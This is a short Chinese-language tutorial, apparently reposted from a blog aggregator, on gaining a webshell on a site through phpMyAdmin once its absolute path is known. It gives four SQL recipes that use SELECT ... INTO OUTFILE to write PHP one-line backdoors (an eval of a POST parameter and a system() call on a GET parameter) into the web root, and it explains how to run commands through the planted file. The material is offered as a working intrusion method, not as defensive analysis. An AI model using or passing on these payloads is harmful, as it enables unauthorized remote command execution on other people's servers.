通过phpmyadmin各种技巧拿webshell
来源:互联网 发布:淘宝店铺短链接生成 编辑:程序博客网 时间:2024/04/28 13:24
注:一下所有方法得先知道网站的绝对路径
第一种
CREATE TABLE`mysql`.`darkmoon`(`darkmoon1`TEXT NOTNULL);
INSERT INTO`mysql`.`darkmoon`(`darkmoon1`)VALUES(‘<?php@eval($_POST[pass]);?>’);
SELECT`darkmoon1`FROM`darkmoon`INTO OUTFILE’d:/wamp/www/exehack.php’;
DROP TABLE IFEXISTS`darkmoon`;
(这种方法是最为常见的成功率也比较高,懂sql语句的朋友一眼就应该可以看懂什么意思)
以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段
然后在darkmoon1的字段中插入一句话代码
然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名(这里的路径就是网站的程序路径)
最后就是删除darkmoon这个表。
第二种方法
Create TABLE moon(darkmoon text NOTNULL);
Insert INTO moon(darkmoon)VALUES(‘<?php@eval($_POST[pass]);?>’);
select darkmoon from moon into outfile’d:/wamp/www/exehack.php’;
Drop TABLE IFEXISTS moon;
以上方法原理基本与方法一一致
第三种方法:
select'<?php@eval($_POST[pass]);?>’INTO OUTFILE’d:/wamp/www/exehack.php’
第四种方法
select'<?phpecho\'<pre>\’;system($_GET[\’cmd\’]);echo\'</pre>\’;?>’INTO OUTFILE’d:/wamp/www/exehack.php’
不同之处在于导出成功后可以直接执行DOS命令(只要权限够大)
使用方法:www.xxx.com/exehack.php?cmd= (cmd=后面直接执行dos命令)
以上4种方法一般情况下足够拿到网站的webshell权限了。
- 通过phpmyadmin各种技巧拿webshell
- phpmyadmin各种技巧拿webshell
- phpMyAdmin 后台拿webshell
- PhpMyadmin最新拿WEBshell
- phpMyAdmin 后台拿webshell
- phpmyadmin拿webshell
- FCKeditor系统拿webshell
- 拿WebShell的经验
- SDcms后台拿webshell
- wordpress 拿webshell
- 菜鸟拿webshell
- nc上传拿webshell
- NC上传拿Webshell
- 文件包含拿webshell
- 45种方法拿webshell
- disucz 6.1后台拿webshell
- 菜鸟拿WebShell的经验
- 批量拿joomla的webshell
- Android UI 之 PopupWindow
- No resource found that matches the given name 'Theme.AppCompat.Light'.
- template<typename T,int n>
- 观察者模式
- 【leetcode】162. Find Peak Element
- 通过phpmyadmin各种技巧拿webshell
- 选择排序
- 2016-9-17模拟题
- UVa 524 Prime Ring Problem (例题7-4)
- Linux-系统管理-fuser&解决device is busy
- Codeforces-550A-Two Substrings
- android如何让service不被杀死-提高进程优先级
- kali update kener
- PAT乙级.1019. 数字黑洞 (20)